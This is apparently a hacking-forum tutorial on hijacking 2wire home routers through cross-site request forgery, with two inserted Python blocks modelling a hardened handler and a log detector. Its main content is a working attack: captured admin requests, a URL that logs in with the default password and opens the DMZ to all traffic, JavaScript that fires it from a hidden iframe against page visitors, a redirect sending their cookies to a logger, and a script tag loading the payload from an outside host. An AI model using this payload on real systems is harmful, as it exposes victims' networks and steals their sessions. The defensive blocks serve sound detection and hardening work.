Hello... Today I made some code to enable DMZ mode on my router (2wire) and I am going to show you how you can make your own scripts to do the same!
Note: All routers are different. This script works on my 2wire router and is not guaranteed to work on others.
OK, the basic idea of the script we will make is to abuse certain "features" that come with the router and take advantage of the fact that most people keep their router password at the default, because the router can only be accessed from the inside, right??? Not exactly... Some of the features we could take advantage of are remote administration, enabling the DMZ, disabling firewall protection, and others. To accomplish this we must first find a way to authenticate ourselves, second find a way to enable or change the features we please, and third create our router jacking script.
* Authentication
Router authentication varies between routers, so we need to find out how the user authenticates and how we can do the same using a URL. If the router uses a popup and makes you log in as soon as you try to access it, then you can authenticate simply by using
Code:
http://username:password@192.168.254.254/
But, if the router uses form authentication then you must use other methods. Since my router only makes you enter a password when trying to access special components, I could not use the username:password method because I only need to enter a password. I will show you exactly how I found out how to log in to my router using just a URL.
Note: Form authentication uses form fields, which are what we usually see on current sites like MySpace etc... If the router uses these, try the http://username:password method anyway... it may work.
First I wanted to see what HTTP request my browser was making to log in, so I used Burp Proxy (part of the Burp Suite) to watch the HTTP request made by my browser.
Note: Burp Suite can be downloaded from http://portswigger.net/suite/.
I logged in and grabbed the following request with burp proxy.
Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.254.254/xslt?PAGE=E02...T&NEXTPAGE=E02
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

PAGE=A02_POST&THISPAGE=A02_POST&NEXTPAGE=E02&CMSKICK=&PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02&PASSWORD=admin
As you can see, I am using the default password of admin. The request submits the parameters
Code:
PAGE=A02_POST&THISPAGE=A02_POST&NEXTPAGE=E02&CMSKICK=&PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02&PASSWORD=admin
So I decided to use them in a URL like so
Code:
http://192.168.254.254/xslt?PAGE=A02...PASSWORD=admin
And I was successfully logged in!!!
* Tampering with settings
Now we will look for the features we want to tamper with... My router has a firewall we could disable and a DMZ mode we could enable. In this guide I will only enable the DMZ, but the firewall settings could be changed in the same way.
First I watched the request made when I enabled the DMZ mode and got the following
Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.254.254/xslt
Cookie: WHPL=TRUE%3B+SESSKEY%3DWS-3342-1908300%3B+
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC
As you may have noticed, we are now submitting the cookie we received when we logged in. The problem with this is that JavaScript will not store the cookies like a browser does. I still needed the URL to activate DMZ mode anyway, so just like last time I submitted the parameters within the URL like so
Code:
http://192.168.254.254/xslt?PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC
Of course this failed because a valid cookie wasn't submitted. Now I needed to find a URL that would log me in and enable the DMZ at the same time. To find the appropriate parameters I opened my browser and tried to change the DMZ without being authenticated, using the URL above. It then said I needed a password to access that area. Can you guess what I did next??? I entered my password and grabbed the request sent to the router. That request looked something like this
Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.254.254/xslt?PAGE=A02_POST
Cookie: WHPL=TRUE%3B+SESSKEY%3DWS-3342-1908300%3B+
Content-Type: application/x-www-form-urlencoded
Content-Length: 214

PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin
Notice the PASSWORD parameter....
The parameter logged me in and enabled DMZ mode!! Exactly what we want!!!! Just like before I added the parameter to a URL like this
Code:
http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin
* Making our script
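Before building the script, it is worth seeing why the URLs in the previous section work at all, and what a correctly written admin interface checks instead. The following is an added example and not code from the original post or from 2wire: the "vulnerable" function is a model of the behaviour the post observed (query-string and body parameters are interchangeable, and a PASSWORD parameter both logs in and applies the change), while the HardenedAdmin class is an assumed design with a session cookie, a per-session CSRF token, POST-only state changes and a same-origin check. The host, path and parameter names are the post's own; the SESSID and CSRF names are assumptions.

```python
# Added example, not code from the original post or from 2wire. Models why the
# login-and-enable-DMZ URL works and what a hardened handler would check instead.
import hmac
import secrets
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

ROUTER_HOST = "192.168.254.254"
STATE_CHANGING_PAGES = {"A02_POST", "E02_POST_DMZ"}

# The login-and-enable-DMZ URL from the post.
DMZ_URL = ("http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02"
           "&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02"
           "&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC"
           "&PASSWORD=admin")


def request_from_url(url, method="GET", headers=None, body=""):
    """Model of a request as the router's handler sees it."""
    parts = urlsplit(url)
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query, keep_blank_values=True),
        "headers": headers or {},
        "body": parse_qs(body, keep_blank_values=True),
    }


def vulnerable_decision(req, admin_password="admin"):
    """Behaviour the post observed: query-string and body parameters are merged,
    and a matching PASSWORD parameter both logs in and applies the change. Any
    page that can make the browser fetch the URL (an <img> or <iframe>) therefore
    reconfigures the router with no session or origin check at all."""
    params = {**req["query"], **req["body"]}
    pages = set(params.get("PAGE", []))
    if params.get("PASSWORD", [None])[0] == admin_password and pages & STATE_CHANGING_PAGES:
        return "applied"
    return "rejected"


class HardenedAdmin:
    """Assumed hardened handler (not 2wire's firmware): session in a cookie,
    CSRF token in the body, POST only, same-origin only, no password outside
    the login endpoint."""

    def __init__(self, admin_password="admin"):
        self.admin_password = admin_password
        self.sessions = {}  # session id -> CSRF token bound to that session

    def login(self, password):
        if not hmac.compare_digest(password, self.admin_password):
            return None
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = secrets.token_urlsafe(16)
        return sid

    def decide(self, req):
        if req["method"] != "POST":
            return "rejected: state change requested with GET"
        if req["query"]:
            return "rejected: parameters in the query string"
        if "PASSWORD" in req["body"]:
            return "rejected: password accepted only by the login endpoint"
        jar = SimpleCookie(req["headers"].get("Cookie", ""))
        sid = jar["SESSID"].value if "SESSID" in jar else None
        if sid not in self.sessions:
            return "rejected: no valid session cookie"
        origin = req["headers"].get("Origin") or req["headers"].get("Referer", "")
        if urlsplit(origin).netloc != ROUTER_HOST:
            return "rejected: cross-site request from %r" % origin
        token = req["body"].get("CSRF", [""])[0]
        if not hmac.compare_digest(token, self.sessions[sid]):
            return "rejected: CSRF token mismatch"
        if not set(req["body"].get("PAGE", [])) & STATE_CHANGING_PAGES:
            return "rejected: unknown action"
        return "applied"


def demo():
    """Returns (vulnerable verdict, hardened verdict on the same cross-site
    request, hardened verdict on a legitimate same-origin POST)."""
    admin = HardenedAdmin()
    # The post's URL, fetched by the browser from a page on another site.
    cross_site = request_from_url(DMZ_URL, headers={"Referer": "http://subdomain.host.com/page.html"})
    # A legitimate change made from the router's own UI after logging in.
    sid = admin.login("admin")
    legit = request_from_url(
        "http://192.168.254.254/xslt", method="POST",
        headers={"Cookie": "SESSID=" + sid, "Origin": "http://192.168.254.254"},
        body="PAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&CSRF=" + admin.sessions[sid],
    )
    return vulnerable_decision(cross_site), admin.decide(cross_site), admin.decide(legit)


if __name__ == "__main__":
    for name, verdict in zip(("vulnerable", "hardened/cross-site", "hardened/legit"), demo()):
        print(name, "->", verdict)
```

Each check in `decide` closes one of the doors the post walks through: refusing GET stops the `<img>`/`<iframe>` trick, refusing query-string parameters stops the "paste the POST body into a URL" trick, keeping the password out of the state-changing endpoint stops the combined login-and-change request, and the origin plus CSRF-token checks stop a page on another site from replaying a valid session.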
Now we need to make a .js file that will invisibly change what we want and open an iframe to a valid page. To do this we will echo the HTML out from JavaScript so we can use the <iframe> tag inside our JavaScript file... The code I came up with is
Code:
// Page body with no margins, so the visible iframe fills the window
document.write('<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">');
// Hidden iframe that requests the login-and-enable-DMZ URL found above
document.write('<iframe frameborder="0" scrolling="no" height="0" width="0" src="http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin"></iframe>');
// Full-size iframe showing a valid page
document.write('<iframe src="http://www.google.com/" width="100%" height="100%" frameborder="0"></iframe>');
Note: As you can see, we also used the body tags... Echoing out HTML from JavaScript can be very useful for many different things. Remember this.
This script opens an invisible iframe to change the victim's router settings and opens a borderless iframe to Google... Now you might be wondering how you will log their IP... Well, we will make the script redirect to an info logger after 8 seconds to log the date, referer, IP, and guess what? Cookies as a bonus. Here is the updated script
Code:
document.write('<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">');
document.write('<iframe frameborder="0" scrolling="no" height="0" width="0" src="http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin"></iframe>');
document.write('<iframe src="http://www.google.com/" width="100%" height="100%" frameborder="0"></iframe>');
// After 8 seconds, redirect to the logger with the page's cookies in the query string
setTimeout("document.location='info.php?c='+document.cookie", 8000);
Making the script redirect to Google (because that's where the iframe location was... this way we don't make the victim suspicious, and there will be no evidence they were hacked because the page will redirect to a valid site) after 8 seconds allows the router jacker to completely load on most systems. The info.php file we are using is just a cookie logger. You can find out how to make one at http://www.criticalsecurity.net/index.php?s=6270e82f7760b429bd06897de9054002&showtopic=7137&pid=213099&st=200&#entry213099. Everyone thank 1nj3cth4x! OK, now we have hacked their router, logged their IP, stolen their cookies, and logged the date... We can now connect to ports they have open on their box.
Tip: Don't forget to look for other "features" you can abuse.
Note: This router jacker works on my router. You can follow the same steps to hack other routers also...
Lastly, you need to know how to inject the script... It is as easy as
Code:
<script src="http://subdomain.host.com/script.js"></script>
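For the defender's side of this, here is how the pattern the whole tutorial relies on shows up in web-proxy or router access logs. This is an added example and not part of the original post: the log format (timestamp, client, method, URL, status, referer) and the sample lines are constructed for the example, while the router address, admin path and parameter names are the post's own. The detector flags three things that a legitimate session from the router's own UI never produces: a credential in a GET query string, a cross-site referer on a request to the admin interface, and an exposure-widening parameter (FWALLOW=ALL_TRAFFIC) on that request.

```python
# Added example, not part of the original post: detect router-jacking style
# requests in constructed proxy/access log lines.
from urllib.parse import parse_qs, urlsplit

ROUTER_HOST = "192.168.254.254"
ADMIN_PATH = "/xslt"
CREDENTIAL_PARAMS = {"PASSWORD"}
# Parameter values that widen exposure, taken from the post's DMZ request.
EXPOSURE_CHANGES = {"FWALLOW": {"ALL_TRAFFIC"}}

# Constructed sample log (assumed format: ts client method url status referer).
# Line 3 is the post's login-and-enable-DMZ URL fetched from another site.
SAMPLE_LOG = """\
2008-03-01T10:12:03 192.168.254.10 GET http://192.168.254.254/xslt?PAGE=E02 200 http://192.168.254.254/xslt?PAGE=A02
2008-03-01T10:12:05 192.168.254.10 POST http://192.168.254.254/xslt 200 http://192.168.254.254/xslt?PAGE=E02
2008-03-01T10:12:09 192.168.254.10 GET http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin 200 http://subdomain.host.com/page.html
2008-03-01T10:12:17 192.168.254.10 GET http://www.google.com/ 200 http://subdomain.host.com/page.html
"""


def parse_line(line):
    """Split one log line into its fields (assumed space-separated format)."""
    ts, client, method, url, status, referer = line.split(" ", 5)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": status, "referer": referer.strip()}


def analyse(entry):
    """Return the reasons this entry is suspicious (empty list if none)."""
    url = urlsplit(entry["url"])
    if url.hostname != ROUTER_HOST or url.path != ADMIN_PATH:
        return []  # not a request to the router's admin interface
    reasons = []
    params = parse_qs(url.query, keep_blank_values=True)
    # 1. A password belongs in a POST body to the login page, never in a GET URL.
    if entry["method"] == "GET" and CREDENTIAL_PARAMS & params.keys():
        reasons.append("credential in query string")
    # 2. Requests to the admin UI should only be referred by the admin UI itself.
    ref_host = urlsplit(entry["referer"]).hostname
    if entry["referer"] not in ("", "-") and ref_host != ROUTER_HOST:
        reasons.append("cross-site referer %s" % ref_host)
    # 3. Parameters that open the box up (DMZ / allow all traffic).
    for name, bad_values in EXPOSURE_CHANGES.items():
        hit = bad_values & set(params.get(name, []))
        if hit:
            reasons.append("exposure change %s=%s" % (name, ",".join(sorted(hit))))
    return reasons


def scan(log_text):
    """Run analyse() over every line and collect the flagged entries."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        reasons = analyse(entry)
        if reasons:
            findings.append({"ts": entry["ts"], "client": entry["client"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["client"], "; ".join(f["reasons"]))
```

Only the third line is flagged, with all three reasons; the normal login flow (line 1), a same-origin POST (line 2) and the decoy page (line 4) pass. In a real deployment the same three checks map onto what a router vendor can log or a home proxy can see, and any one of them on its own is worth an alert because none occurs during ordinary use of the admin UI.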
You may be wondering how you will know what type of router your victim is using?? Well, in the next tutorial I will show you how to enumerate routers.
Soon I will release router hacking packs for different routers... Look for them in the exploits section.
OK! I hope you learned a lot and enjoyed reading! Please leave comments and suggestions..